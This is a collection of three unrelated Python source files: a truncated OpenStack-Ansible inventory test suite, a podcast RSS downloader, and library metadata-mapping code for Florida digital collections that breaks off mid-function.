'log_containers',
'log_hosts',
'memcached',
'memcached_all',
'memcached_container',
'metering-alarm_containers',
'metering-alarm_hosts',
'metering-compute_container',
'metering-compute_containers',
'metering-compute_hosts',
'metering-infra_containers',
'metering-infra_hosts',
'network_all',
'network_containers',
'network_hosts',
'neutron_agent',
'neutron_agents_container',
'neutron_all',
'neutron_dhcp_agent',
'neutron_l3_agent',
'neutron_lbaas_agent',
'neutron_linuxbridge_agent',
'neutron_metadata_agent',
'neutron_metering_agent',
'neutron_server',
'neutron_server_container',
'nova_all',
'nova_api_metadata',
'nova_api_metadata_container',
'nova_api_os_compute',
'nova_api_os_compute_container',
'nova_cert',
'nova_cert_container',
'nova_compute',
'nova_compute_container',
'nova_conductor',
'nova_conductor_container',
'nova_console',
'nova_console_container',
'nova_scheduler',
'nova_scheduler_container',
'os-infra_all',
'os-infra_containers',
'os-infra_hosts',
'pkg_repo',
'rabbit_mq_container',
'rabbitmq',
'rabbitmq_all',
'remote',
'remote_containers',
'repo-infra_all',
'repo-infra_containers',
'repo-infra_hosts',
'repo_all',
'repo_container',
'rsyslog',
'rsyslog_all',
'rsyslog_container',
'shared-infra_all',
'shared-infra_containers',
'shared-infra_hosts',
'storage-infra_all',
'storage-infra_containers',
'storage-infra_hosts',
'storage_all',
'storage_containers',
'storage_hosts',
'swift-proxy_containers',
'swift-proxy_hosts',
'swift-remote_containers',
'swift-remote_hosts',
'swift_acc',
'swift_acc_container',
'swift_all',
'swift_cont',
'swift_cont_container',
'swift_containers',
'swift_hosts',
'swift_obj',
'swift_obj_container',
'swift_proxy',
'swift_proxy_container',
'swift_remote',
'swift_remote_all',
'swift_remote_container',
'utility',
'utility_all',
'utility_container',
]
@classmethod
def setUpClass(cls):
cls.inventory = get_inventory()
def test_meta(self):
meta = self.inventory['_meta']
self.assertIsNotNone(meta, "_meta missing from inventory")
self.assertIsInstance(meta, dict, "_meta is not a dict")
def test_hostvars(self):
hostvars = self.inventory['_meta']['hostvars']
self.assertIsNotNone(hostvars, "hostvars missing from _meta")
self.assertIsInstance(hostvars, dict, "hostvars is not a dict")
def test_group_vars_all(self):
group_vars_all = self.inventory['all']
self.assertIsNotNone(group_vars_all,
"group vars all missing from inventory")
self.assertIsInstance(group_vars_all, dict,
"group vars all is not a dict")
the_vars = group_vars_all['vars']
self.assertIsNotNone(the_vars,
"vars missing from group vars all")
self.assertIsInstance(the_vars, dict,
"vars in group vars all is not a dict")
def test_expected_host_groups_present(self):
for group in self.expected_groups:
the_group = self.inventory[group]
self.assertIsNotNone(the_group,
"Required host group: %s is missing "
"from inventory" % group)
self.assertIsInstance(the_group, dict)
if group != 'all':
self.assertIn('hosts', the_group)
self.assertIsInstance(the_group['hosts'], list)
def test_only_expected_host_groups_present(self):
all_keys = list(self.expected_groups)
all_keys.append('_meta')
self.assertEqual(set(all_keys), set(self.inventory.keys()))
class TestUserConfiguration(unittest.TestCase):
def setUp(self):
self.longMessage = True
self.loaded_user_configuration = di.load_user_configuration(TARGET_DIR)
def test_loading_user_configuration(self):
"""Test that the user configuration can be loaded"""
self.assertIsInstance(self.loaded_user_configuration, dict)
class TestDuplicateIps(unittest.TestCase):
def setUp(self):
# Allow custom assertion errors.
self.longMessage = True
def test_duplicates(self):
"""Test that no duplicate IPs are made on any network."""
for i in xrange(0, 99):
inventory = get_inventory()
ips = collections.defaultdict(int)
hostvars = inventory['_meta']['hostvars']
for host, var_dict in hostvars.items():
nets = var_dict['container_networks']
for net, vals in nets.items():
if 'address' in vals.keys():
addr = vals['address']
ips[addr] += 1
self.assertEqual(1, ips[addr],
msg="IP %s duplicated." % addr)
class TestConfigChecks(unittest.TestCase):
def setUp(self):
self.user_defined_config = dict()
with open(USER_CONFIG_FILE, 'rb') as f:
self.user_defined_config.update(yaml.safe_load(f.read()) or {})
def setup_config_file(self, user_defined_config, key):
try:
if key in user_defined_config:
del user_defined_config[key]
elif key in user_defined_config['global_overrides']:
del user_defined_config['global_overrides'][key]
else:
raise KeyError("can't find specified key in user config")
finally:
            # temporarily rename our user_config_file so we can use the new one
os.rename(USER_CONFIG_FILE, USER_CONFIG_FILE + ".tmp")
# Save new user_config_file
with open(USER_CONFIG_FILE, 'wb') as f:
f.write(yaml.dump(user_defined_config))
def test_provider_networks_check(self):
# create config file without provider networks
self.setup_config_file(self.user_defined_config, 'provider_networks')
        # check that the absence of provider networks is caught
with self.assertRaises(subprocess.CalledProcessError) as context:
get_inventory()
expectedLog = "provider networks can't be found under global_overrides"
self.assertTrue(expectedLog in context.exception.output)
def test_global_overrides_check(self):
# create config file without global_overrides
self.setup_config_file(self.user_defined_config, 'global_overrides')
        # check that the absence of global_overrides is caught
with self.assertRaises(subprocess.CalledProcessError) as context:
get_inventory()
expectedLog = "global_overrides can't be found in user config\n"
self.assertEqual(context.exception.output, expectedLog)
def tearDown(self):
# get back our initial user config file
os.remove(USER_CONFIG_FILE)
os.rename(USER_CONFIG_FILE + ".tmp", USER_CONFIG_FILE)
if __name__ == '__main__':
unittest.main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import httplib
import os
import shutil
import socket
import urllib2
import xml.dom.minidom
from operator import itemgetter
from slugify import slugify
from code.db_handler import DbHandler
from code.settings import settings
from mailer import mail_updates
class RssHandler:
def __init__(self, feed=None, db=None):
"""
Setup the RSS handler.
:param feed: URL to the RSS feed
:param db: DB class object
"""
self.feed = feed
if db:
self.db = db
else:
self.db = DbHandler()
# Create the base DOWNLOAD_DIRECTORY as found in settings if it has not been created yet.
if not os.path.exists(settings.DOWNLOAD_DIRECTORY):
print "Podcast download directory is missing. Creating: '" + settings.DOWNLOAD_DIRECTORY + "'"
try:
os.mkdir(settings.DOWNLOAD_DIRECTORY)
print "Download directory '" + settings.DOWNLOAD_DIRECTORY + "' created"
except OSError:
exit("Could not create podcast download sub-directory!")
def subscribe(self):
"""
Subscribe to a podcast. Then download the first x number of episodes as defined in the settings.
"""
message = ""
data = self._open_data_source()
        if not data:
exit("Not a valid XML file or URL feed!")
podcasts = self._iterate_feed(data)
if podcasts:
message += self._save_podcasts(podcasts)
message += self._delete_old_podcasts(podcasts[0]['dir'])
if self.db.has_mail_users():
mail_updates(message, self.db.get_mail_users())
print message
def unsubscribe(self):
"""
        Delete a subscription: remove it from the database and delete all podcasts in its directory.
"""
feed_name = self.db.get_name_from_feed(self.feed)
        if not feed_name:
exit("Feed does not exist in the database!")
else:
feed_name = slugify(feed_name)
channel_directory = settings.DOWNLOAD_DIRECTORY + os.sep + feed_name
self.db.delete_subscription(self.feed)
try:
shutil.rmtree(channel_directory)
except OSError:
print "Subscription directory has not been found - it might have been manually deleted"
print "Subscription '" + feed_name + "' removed"
def update(self):
"""
Update and loop through all subscriptions.
Then download the first x number of episodes as defined in the settings.
"""
message = ""
for sub in self.db.get_subscriptions():
channel_name = sub[0]
self.feed = sub[1]
data = self._open_data_source()
if data:
message += "Feed for subscription: '" + channel_name + "' is updating...\n"
podcasts = self._iterate_feed(data)
if podcasts:
message += self._save_podcasts(podcasts)
message += self._delete_old_podcasts(podcasts[0]['dir'])
else:
message += "No podcasts to update.\n"
if self.db.has_mail_users():
mail_updates(message, self.db.get_mail_users())
print message
def _iterate_feed(self, data):
last_ep_date = 0
podcasts = []
try:
xml_data = xml.dom.minidom.parse(data).getElementsByTagName('channel')[0]
channel_title = slugify(xml_data.getElementsByTagName('title')[0].firstChild.data)
# Build the channel dir and create it if it doesn't exist
channel_directory = settings.DOWNLOAD_DIRECTORY + os.sep + channel_title
if not os.path.exists(channel_directory):
os.makedirs(channel_directory)
# Fetch the last episode date, or
# Create a DB entry if the subscription doesn't exist
if self.db.does_sub_exist(self.feed):
last_ep_date = self.db.get_last_subscription_downloaded(self.feed)
else:
self.db.insert_subscription(channel_title, self.feed)
# Iterate though each item (podcast) in the xml_data
for item in xml_data.getElementsByTagName('item'):
# Get and convert the date of the current podcast
item_time = self._date_to_int(
item.getElementsByTagName('pubDate')[0].firstChild.data
)
# If current podcast date > the last episode date, and
# The number of podcasts from the settings > number of current podcasts downloaded
# Add the current podcast to the list
if item_time > last_ep_date and settings.NUMBER_OF_PODCASTS_TO_KEEP > len(podcasts):
podcasts.append({
'title': item.getElementsByTagName('title')[0].firstChild.data,
'file': item.getElementsByTagName('enclosure')[0].getAttribute('url'),
'dir': channel_directory,
'type': item.getElementsByTagName('enclosure')[0].getAttribute('type'),
'size': item.getElementsByTagName('enclosure')[0].getAttribute('length'),
'date': item_time
})
else:
break
        except (TypeError, ValueError):
            # Return an empty list so callers can safely test `if podcasts:`
            # (returning an error string here would be indexed like a list).
            print "This item has a badly formatted date. Cannot download!"
            return []
        except xml.parsers.expat.ExpatError:
            print "ERROR - Malformed XML syntax in feed."
            return []
        except UnicodeEncodeError:
            print "ERROR - Unicode encoding error in string. Cannot convert to ASCII."
            return []
return podcasts
def _open_data_source(self):
"""
        Try to open the feed (self.feed) as declared in init or update.
:return: the data feed or None if there was a problem
"""
        try:
            response = urllib2.urlopen(self.feed)
        except (ValueError, urllib2.URLError, httplib.IncompleteRead):
            # Not a usable URL - fall back to treating the feed as a local file.
            try:
                response = open(self.feed, 'r')
            except (IOError, ValueError):
                return None
        return response
def _save_podcasts(self, podcasts):
"""
Given a list of podcasts, save the podcasts to the file system.
:param podcasts:
'title': title of the podcast,
'file': URL where the podcast can be downloaded,
'dir': The dir to save the podcast at,
'type': file type of the podcast,
'size': byte size of the podcast,
'date': date the podcast was uploaded
:return: Message to display to user.
"""
message = ""
extension_map = {
'video/quicktime': '.mp4',
'audio/mp4': '.mp4',
'video/mp4': '.mp4',
'video/mpeg': '.mpg',
'video/x-flv': '.flv',
'video/x-ms-wmv': '.wmv',
'video/webm': '.webm',
'audio/webm': '.webm',
'audio/mpeg': '.mp3',
'audio/ogg': '.ogg',
'video/ogg': '.ogg',
'audio/vorbis': '.ogg',
'audio/x-ms-wma': '.wma',
'audio/x-ms-wax': '.wma',
}
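        # e.g. extension_map.get('audio/mpeg') -> '.mp3'; MIME types missing
        # from this map yield None and the file name is left as-is (see below).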
if podcasts:
# Sort the podcasts so the oldest one is saved first.
# This allows us to use the file system time for tracking which podcast is the oldest.
podcasts = sorted(podcasts, key=itemgetter('date'))
for podcast in podcasts:
# Get the file name (we don't use the path right now)
item_file_name = podcast['title']
                # Limit the file name to only the first 50 chars
if len(item_file_name) > 50:
item_file_name = item_file_name[:50]
# Build the local file
local_file = podcast['dir'] + os.sep + slugify(item_file_name)
                # Make sure the file has the correct extension
                # (use .get() so an unknown MIME type doesn't raise a KeyError)
                extension = extension_map.get(podcast['type'])
                if extension and not local_file.endswith(extension):
                    local_file += extension
# If the file isn't already there, try and save it
if not os.path.exists(local_file):
# TODO: This print will need to get removed at some point
                    # But it's nice for CLI usage, so it can stay for now.
print "Downloading " + podcast['title']
try:
item_file = urllib2.urlopen(podcast['file'])
with open(local_file, 'wb') as output:
output.write(item_file.read())
message += "Downloaded Podcast: " + podcast['title'] + "\n"
                    except urllib2.URLError as e:
                        message += "ERROR - Could not write item to file: " + str(e) + "\n"
                    except socket.error as e:
                        message += "ERROR - Socket reset by peer: " + str(e) + "\n"
self.db.update_subscription(self.feed, podcasts[-1]['date'])
return message
def _delete_old_podcasts(self, channel_dir):
"""
        Delete all old podcasts from a given dir, keeping only NUMBER_OF_PODCASTS_TO_KEEP from settings.
:param channel_dir: The dir where the podcasts live
:return: Message to display to user.
"""
message = "Deleted Files: \n"
os.chdir(channel_dir)
files = sorted(os.listdir(os.getcwd()), key=os.path.getmtime)
if len(files) <= settings.NUMBER_OF_PODCASTS_TO_KEEP:
return "No files to delete"
for old_file in files[:len(files) - settings.NUMBER_OF_PODCASTS_TO_KEEP]:
os.remove(old_file)
message += old_file + "\n"
return message
def _date_to_int(self, date):
"""
Convert a date (%a, %d %b %Y %H:%M:%S) to an int
:param date: date
:return: seconds since epoch
"""
new_date = ""
split_array = date.split(' ')
for i in range(0, 5):
new_date += split_array[i] + " "
if new_date:
return int(datetime.datetime.strptime(new_date[:-1], "%a, %d %b %Y %H:%M:%S").strftime('%s'))
else:
return 0
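    # Illustrative round trip (hypothetical values; note strftime('%s') is
    # platform- and timezone-dependent):
    #   _date_to_int("Mon, 01 Jan 2018 12:00:00 +0000") -> seconds since epoch
    #   _int_to_date(<that integer>) -> "Mon, 01 Jan 2018 12:00:00"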
def _int_to_date(self, date):
"""
Convert a int (seconds since epoch) to a date
:param date: seconds since epoch
:return: date
"""
return datetime.datetime.fromtimestamp(date).strftime("%a, %d %b %Y %H:%M:%S")
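# A minimal usage sketch (hypothetical feed URL; assumes settings and the
# database above are configured):
if __name__ == '__main__':
    handler = RssHandler(feed='http://example.com/podcast.xml')
    handler.subscribe()      # download the first N episodes per settings
    # handler.update()       # refresh every stored subscription
    # handler.unsubscribe()  # drop the feed and its downloaded files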
|
|
import re
import requests
from bs4 import BeautifulSoup
from pymods import OAIReader
# custom functions and variables
import assets
from citrus_config import VERBOSE
nameSpace_default = { None: '{http://www.loc.gov/mods/v3}',
'oai_dc': '{http://www.openarchives.org/OAI/2.0/oai_dc/}',
'dc': '{http://purl.org/dc/elements/1.1/}',
'mods': '{http://www.loc.gov/mods/v3}',
'dcterms': '{http://purl.org/dc/terms/}',
'xlink': '{http://www.w3.org/1999/xlink}',
'repox': '{http://repox.ist.utl.pt}',
'oai_qdc': '{http://worldcat.org/xmlschemas/qdc-1.0/}'}
dc = nameSpace_default['dc']
dcterms = nameSpace_default['dcterms']
IANA_type_list = []
IANA_XML = requests.get('http://www.iana.org/assignments/media-types/media-types.xml')
IANA_parsed = BeautifulSoup(IANA_XML.text, "lxml")
for media_type in IANA_parsed.find_all('file'):
    IANA_type_list.append(media_type.text)
def FlaLD_DC(file_in, tn, dprovide, iprovide=None):
with open(file_in, encoding='utf-8') as data_in:
logger = assets.CSVLogger('FlaLD_DC', provider=dprovide)
records = OAIReader(data_in)
docs = []
for record in records:
# deleted record handling for repox
try:
if 'deleted' in record.attrib.keys():
if record.attrib['deleted'] == 'true':
continue
except AttributeError:
pass
# deleted record handling for OAI-PMH
try:
if 'status' in record.find('./{*}header').attrib.keys():
if record.find('./{*}header').attrib['status'] == 'deleted':
continue
except AttributeError:
pass
oai_id = record.oai_urn
if VERBOSE:
print(oai_id)
logger.debug(oai_id)
sourceResource = {}
# sourceResource.alternative
# sourceResource.collection
# sourceResource.contributor
if record.metadata.get_element('.//{0}contributor'.format(dc)):
sourceResource['contributor'] = [{"name": name}
for name in
record.metadata.get_element(
'.//{0}contributor'.format(dc),
delimiter=';')]
# sourceResource.creator
if record.metadata.get_element('.//{0}creator'.format(dc)):
sourceResource['creator'] = []
for name in record.metadata.get_element('.//{0}creator'.format(dc),
delimiter=';'):
                # need to test for ( Contributor ) and ( contributor );
                # note str.rstrip() strips a character set rather than a
                # suffix, so the marker is removed with a regex instead
                if (len(name) > 0) and ("ontributor )" not in name):
                    sourceResource['creator'].append({"name": name.strip(" ")})
                elif "ontributor )" in name:
                    if 'contributor' not in sourceResource.keys():
                        sourceResource['contributor'] = []
                    sourceResource['contributor'].append({"name": re.sub(
                        r'\s*\(\s*[Cc]ontributor\s*\)\s*$', '',
                        name.strip(" "))})
# sourceResource.date
date = record.metadata.get_element('.//{0}date'.format(dc))
if date:
sourceResource['date'] = {"begin": date[0], "end": date[0], "displayDate": date[0]}
# sourceResource.description
if record.metadata.get_element('.//{0}description'.format(dc)):
sourceResource['description'] = record.metadata.get_element(
'.//{0}description'.format(dc), delimiter=';')
# sourceResource.extent
# sourceResource.format
if record.metadata.get_element('.//{0}format'.format(dc)):
sourceResource['format'] = record.metadata.get_element(
'.//{0}format'.format(dc))
# sourceResource.genre
# sourceResource.identifier
dPantherPURL = re.compile('http://dpanther.fiu.edu/dpService/dpPurlService')
dPantherURL = re.compile('http://dpanther')
identifier = record.metadata.get_element('.//{0}identifier'.format(dc))
try:
for ID in identifier:
if dPantherPURL.search(ID):
PURL_match = ID
sourceResource['identifier'] = ID
break
elif dPantherURL.search(ID):
sourceResource['identifier'] = ID
logger.warning('sourceResource.identifier: {0} - {1}'.format('Not a PURL',
oai_id))
is_shown_at = sourceResource['identifier']
except (TypeError, UnboundLocalError) as err:
logger.error(
'sourceResource.identifier: {0} - {1}'.format(err,
oai_id))
continue
# sourceResource.language
if record.metadata.get_element('.//{0}language'.format(dc)):
sourceResource['language'] = []
for element in record.metadata.get_element(
'.//{0}language'.format(dc), delimiter=';'):
if len(element) > 3:
sourceResource['language'].append({"name": element})
else:
sourceResource['language'].append({"iso_639_3": element})
# sourceResource.place : sourceResource['spatial']
if record.metadata.get_element('.//{0}coverage'.format(dc)):
sourceResource['spatial'] = [{'name': place}
for place in
record.metadata.get_element(
'.//{0}coverage'.format(dc))]
# sourceResource.publisher
if record.metadata.get_element('.//{0}publisher'.format(dc)):
sourceResource['publisher'] = record.metadata.get_element(
'.//{0}publisher'.format(dc))
# sourceResource.relation
# sourceResource.isReplacedBy
# sourceResource.replaces
# sourceResource.rights
rights = record.metadata.get_element('.//{0}rights'.format(dc))
if rights:
sourceResource['rights'] = [{'text': rights[0]}]
else:
logger.error('No sourceResource.rights - {0}'.format(oai_id))
continue
# sourceResource.subject
if record.metadata.get_element('.//{0}subject'.format(dc)):
sourceResource['subject'] = []
for term in record.metadata.get_element('.//{0}subject'.format(dc),
delimiter=';'):
                    term = re.sub(r"\( lcsh \)$", '', term)
if len(term) > 0:
sourceResource['subject'].append({"name": term.strip(" ")})
# sourceResource.title
title = record.metadata.get_element('.//{0}title'.format(dc))
if title:
sourceResource['title'] = title
else:
                logger.error('No sourceResource.title - {0}'.format(oai_id))
continue
# sourceResource.type
if record.metadata.get_element('.//{0}type'.format(dc)):
sourceResource['type'] = record.metadata.get_element(
'.//{0}type'.format(dc), delimiter=';')
# webResource.fileFormat
# aggregation.dataProvider
data_provider = dprovide
# aggregation.intermediateProvider
# aggregation.isShownAt
# aggregation.preview
preview = None
try:
preview = assets.thumbnail_service(record, tn)
except (TypeError, UnboundLocalError) as err:
logger.warning('aggregation.preview: {0} - {1}'.format(err, oai_id))
pass
# aggregation.provider
# build record
try:
if is_shown_at:
doc = assets.build(oai_id, sourceResource, data_provider, is_shown_at, preview, iprovide)
docs.append(doc)
except UnboundLocalError:
logger.error('No aggregation.isShownAt - {0}'.format(oai_id))
continue
return docs
def FlaLD_QDC(file_in, tn, dprovide, iprovide=None):
with open(file_in, encoding='utf-8') as data_in:
logger = assets.CSVLogger('FlaLD_QDC', provider=dprovide)
records = OAIReader(data_in)
docs = []
for record in records:
# deleted record handling for repox
try:
if 'deleted' in record.attrib.keys():
if record.attrib['deleted'] == 'true':
continue
except AttributeError:
pass
# deleted record handling for OAI-PMH
try:
if 'status' in record.find('./{*}header').attrib.keys():
if record.find('./{*}header').attrib['status'] == 'deleted':
continue
except AttributeError:
pass
# skip record handling
try:
if 'noharvest' in record.metadata.get_element('.//{0}requires'.format(dcterms)):
continue
except TypeError:
pass
oai_id = record.oai_urn
if VERBOSE:
print(oai_id)
logger.debug(oai_id)
sourceResource = {}
# sourceResource.alternative
alt_title = record.metadata.get_element(
'.//{0}alternative'.format(dcterms))
if alt_title:
sourceResource['alternative'] = alt_title
# sourceResource.collection
# sourceResource.contributor
if record.metadata.get_element('.//{0}contributor'.format(dc)):
sourceResource['contributor'] = [{"name": name}
for name in record.metadata.get_element(
'.//{0}contributor'.format(dc), delimiter=';')]
# sourceResource.creator
if record.metadata.get_element('.//{0}creator'.format(dc)):
sourceResource['creator'] = [{"name": name}
for name in record.metadata.get_element(
'.//{0}creator'.format(dc), delimiter=';')]
# sourceResource.date
            # Fall back through the available date elements in order of
            # preference until one yields a value.
            date = None
            for date_element in ('.//{0}created'.format(dcterms),
                                 './/{0}issued'.format(dcterms),
                                 './/{0}date'.format(dcterms),
                                 './/{0}date'.format(dc),
                                 './/{0}available'.format(dcterms),
                                 './/{0}dateAccepted'.format(dcterms),
                                 './/{0}dateCopyrighted'.format(dcterms),
                                 './/{0}dateSubmitted'.format(dcterms)):
                date = record.metadata.get_element(date_element)
                if date is not None:
                    break
            if date is not None:
                sourceResource['date'] = {"begin": date[0], "end": date[0],
                                          "displayDate": date[0]}
# sourceResource.description
description = []
if record.metadata.get_element(
'.//{0}description'.format(dc)) is not None:
for item in record.metadata.get_element(
'.//{0}description'.format(dc)):
description.append(item)
if record.metadata.get_element(
'.//{0}abstract'.format(dcterms)) is not None:
for item in record.metadata.get_element(
'.//{0}abstract'.format(dcterms)):
description.append(item)
if description:
sourceResource['description'] = description
# sourceResource.extent
if record.metadata.get_element('.//{0}extent'.format(dcterms)):
sourceResource['extent'] = record.metadata.get_element(
'.//{0}extent'.format(dcterms), delimiter=';')
# sourceResource.format
# sourceResource.genre
if record.metadata.get_element('.//{0}format'.format(dc)):
sourceResource['genre'] = []
for element in record.metadata.get_element('.//{0}format'.format(dc),
delimiter=';'):
if element.lower() in IANA_type_list:
                        file_format = element.lower()
elif len(element) > 0:
sourceResource['genre'].append({'name': element.strip(' ')})
if len(sourceResource['genre']) == 0:
del sourceResource['genre']
# sourceResource.identifier
sourceResource['identifier'] = oai_id
# sourceResource.language
if record.metadata.get_element('.//{0}language'.format(dc)):
sourceResource['language'] = []
for element in record.metadata.get_element(
'.//{0}language'.format(dc), delimiter=';'):
if len(element) > 3:
sourceResource['language'].append({"name": element})
else:
sourceResource['language'].append({"iso_639_3": element})
# sourceResource.place : sourceResource['spatial']
if record.metadata.get_element('.//{0}spatial'.format(dcterms)):
sourceResource['spatial'] = [{'name': place}
for place in record.metadata.get_element(
'.//{0}spatial'.format(dcterms), delimiter=';')]
# sourceResource.publisher
publisher = record.metadata.get_element('.//{0}publisher'.format(dc))
if publisher:
sourceResource['publisher'] = publisher
# sourceResource.relation
# sourceResource.isReplacedBy
# sourceResource.replaces
# sourceResource.rights
rightsURI = re.compile('http://rightsstatements')
if record.metadata.get_element('.//{0}rights'.format(dc)):
for rights_statement in record.metadata.get_element(
'.//{0}rights'.format(dc)):
URI = rightsURI.search(rights_statement)
if URI:
URI_match = URI.string.split(" ")[-1]
sourceResource['rights'] = [{"@id": URI_match}]
else:
sourceResource['rights'] = [{"text": rights_statement}]
else:
logger.error('No sourceResource.rights - {0}'.format(oai_id))
continue
# sourceResource.subject
if record.metadata.get_element('.//{0}subject'.format(dc)):
sourceResource['subject'] = [{"name": name }
for name in record.metadata.get_element(
'.//{0}subject'.format(dc), delimiter=';')]
# sourceResource.title
title = record.metadata.get_element('.//{0}title'.format(dc))
if title is not None:
sourceResource['title'] = title
else:
logger.error('No sourceResource.title - {0}'.format(oai_id))
continue
# sourceResource.type
if record.metadata.get_element('.//{0}type'.format(dc)):
sourceResource['type'] = record.metadata.get_element(
'.//{0}type'.format(dc), delimiter=';')
# webResource.fileFormat
# TODO: file_format kicked out of SR.genre
# aggregation.dataProvider
data_provider = dprovide
# aggregation.intermediateProvider
# aggregation.isShownAt
# aggregation.preview
preview = None
for identifier in record.metadata.get_element('.//{0}identifier'.format(dc)):
if 'http' in identifier:
is_shown_at = identifier
preview = assets.thumbnail_service(identifier, tn)
# aggregation.provider
# build record
try:
if is_shown_at:
doc = assets.build(oai_id, sourceResource, data_provider, is_shown_at, preview, iprovide)
docs.append(doc)
except UnboundLocalError:
logger.error('No aggregation.isShownAt - {0}'.format(oai_id))
continue
return docs
def FlaLD_MODS(file_in, tn, dprovide, iprovide=None):
with open(file_in, encoding='utf-8') as data_in:
logger = assets.CSVLogger('FlaLD_MODS', provider=dprovide)
records = OAIReader(data_in)
docs = []
for record in records:
# deleted record handling for repox
try:
if 'deleted' in record.attrib.keys():
if record.attrib['deleted'] == 'true':
                        continue
except AttributeError:
pass
# deleted record handling for OAI-PMH
try:
if 'status' in record.find('./{*}header').attrib.keys():
if record.find('./{*}header').attrib['status'] == 'deleted':
                        continue
except AttributeError:
pass
if VERBOSE:
print(record.oai_urn)
logger.debug(record.oai_urn)
sourceResource = {}
if record.metadata is None:
continue
# sourceResource.alternative
if len(record.metadata.titles) > 1:
                sourceResource['alternative'] = []
                for alternative_title in record.metadata.titles[1:]:
                    sourceResource['alternative'].append(alternative_title)
# sourceResource.collection
if record.metadata.collection:
collection = record.metadata.collection
sourceResource['collection'] = {}
if collection.title:
sourceResource['collection']['name'] = collection.title
if collection.location:
sourceResource['collection']['host'] = collection.location
if collection.url:
sourceResource['collection']['_:id'] = collection.url
# sourceResource.contributor
            try:
                for name in record.metadata.names:
                    # treat any name not flagged as a creator as a contributor;
                    # append rather than reassign so multiple contributors are kept
                    if name.role.text != 'Creator' and name.role.code != 'cre':
                        if 'contributor' not in sourceResource:
                            sourceResource['contributor'] = []
                        sourceResource['contributor'].append(
                            {"@id": name.uri, "name": name.text}
                            if name.uri else {"name": name.text})
except KeyError as err:
logger.error('sourceResource.contributor: {0}, {1}'.format(err, record.oai_urn))
pass
# sourceResource.creator
if record.metadata.get_creators:
sourceResource['creator'] = [{"@id": name.uri, "name": name.text}
if name.uri else
{"name": name.text}
for name in record.metadata.get_creators]
# sourceResource.date
if record.metadata.dates:
date = record.metadata.dates[0].text
if ' - ' in date:
sourceResource['date'] = {"displayDate": date,
"begin": date[0:4],
"end": date[-4:]}
else:
sourceResource['date'] = {"displayDate": date,
"begin": date,
"end": date}
# sourceResource.description
if record.metadata.abstract:
sourceResource['description'] = [abstract.text
for abstract in record.metadata.abstract]
# sourceResource.extent
if record.metadata.extent:
sourceResource['extent'] = record.metadata.extent
# sourceResource.format
if record.metadata.form:
sourceResource['format'] = record.metadata.form
# sourceResource.genre
if record.metadata.genre:
sourceResource['genre'] = [{'name': genre.text,
'@id': genre.uri}
if genre.uri else
{'name': genre.text}
for genre in record.metadata.genre]
# sourceResource.identifier
try:
sourceResource['identifier'] = record.metadata.purl[0]
except IndexError as err:
logger.error('sourceResource.identifier: {0}, {1}'.format(err, record.oai_urn))
continue
# sourceResource.language
try:
if record.metadata.language:
sourceResource['language'] = [{"name": lang.text,
"iso_639_3": lang.code}
for lang in record.metadata.language]
except AttributeError as err:
logger.error('sourceResource.language: {0}, {1}'.format(err, record.oai_urn))
pass
# sourceResource.place : sourceResource['spatial']
try:
if record.metadata.geographic_code and len(record.metadata.geographic_code) > 0:
sourceResource['spatial'] = []
for geo_code in record.metadata.geographic_code:
                        code, lat, lng, label = assets.tgn_cache(geo_code.strip())
                        sourceResource['spatial'].append({"lat": lat,
                                                          "long": lng,
                                                          "name": label,
                                                          "_:attribution": "This record contains information from Thesaurus of Geographic Names (TGN) which is made available under the ODC Attribution License."})
except TypeError as err:
logger.error('sourceResource.spatial: {0}, {1}'.format(err, record.oai_urn))
continue
# sourceResource.publisher
if record.metadata.publisher:
sourceResource['publisher'] = record.metadata.publisher
# sourceResource.relation
# sourceResource.isReplacedBy
# sourceResource.replaces
# sourceResource.rights
if record.metadata.rights:
sourceResource['rights'] = [{"@id": rights.uri}
if rights.uri else
{"text": rights.text}
for rights in record.metadata.rights]
else:
logger.error('No sourceResource.rights - {0}'.format(record.oai_urn))
continue
# sourceResource.subject
try:
if record.metadata.subjects:
sourceResource['subject'] = [
{"@id": subject.uri, "name": subject.text}
if subject.uri is not None
else {"name": subject.text}
for subject in record.metadata.subjects]
except (TypeError, IndexError) as err:
logger.error('sourceResource.subject: {0}, {1}'.format(err, record.oai_urn))
pass
# sourceResource.title
if record.metadata.titles:
sourceResource['title'] = ['{}'.format(record.metadata.titles[0])]
else:
logger.error('No sourceResource.title: {0}'.format(record.oai_urn))
continue
# sourceResource.type
sourceResource['type'] = record.metadata.type_of_resource
# aggregation.dataProvider
first_baptist = re.compile('^FSU_FBCTLH')
leon_high = re.compile('^FSU_LeonHigh')
godby_high = re.compile('^FSU_Godby')
havana_hhs = re.compile('^FSU_HHHS')
# ringling = re.compile('^FSU_Ringling')
first_baptist_iid = first_baptist.search(record.metadata.iid)
leon_high_iid = leon_high.search(record.metadata.iid)
godby_high_iid = godby_high.search(record.metadata.iid)
havana_hhs_iid = havana_hhs.search(record.metadata.iid)
# ringling_iid = ringling.search(record.metadata.iid)
if first_baptist_iid:
data_provider = 'First Baptist Church of Tallahassee'
iprovide = 'Florida State University Libraries'
elif leon_high_iid:
data_provider = 'Leon High School, Tallahassee, Florida'
iprovide = 'Florida State University Libraries'
elif godby_high_iid:
data_provider = 'Godby High School, Tallahassee, Florida'
iprovide = 'Florida State University Libraries'
elif havana_hhs_iid:
data_provider = 'Havana History & Heritage Society, Havana, Florida'
iprovide = 'Florida State University Libraries'
# elif ringling_iid:
# data_provider = 'John and Mable Ringling Museum of Art'
# iprovide = 'Florida State University Libraries'
else:
data_provider = dprovide
# aggregation.intermediateProvider
# aggregation.isShownAt
# aggregation.preview
preview = None
pid = record.metadata.pid
if pid is None:
pid = record.oai_urn.split(':')[-1].replace('_',':')
preview = assets.thumbnail_service(pid, tn)
# aggregation.provider
# build record
try:
if record.metadata.purl[0]:
doc = assets.build(record.oai_urn, sourceResource, data_provider, record.metadata.purl[0],
preview, iprovide)
docs.append(doc)
except UnboundLocalError:
logger.error('No aggregation.isShownAt - {0}'.format(record.oai_urn))
continue
return docs
def FlaLD_BepressDC(file_in, tn, dprovide, iprovide=None):
def clean_mark_up(text):
mark_up_re = re.compile('<.*?>')
new_line_re = re.compile('\n')
clean_text = re.sub(mark_up_re, '', text)
clean_text = re.sub(new_line_re, ' ', clean_text)
return clean_text
with open(file_in, encoding='utf-8') as data_in:
logger = assets.CSVLogger('FlaLD_BepressDC', provider=dprovide)
records = OAIReader(data_in)
docs = []
for record in records:
# deleted record handling for repox
try:
if 'deleted' in record.attrib.keys():
if record.attrib['deleted'] == 'true':
continue
except AttributeError:
pass
# deleted record handling for OAI-PMH
try:
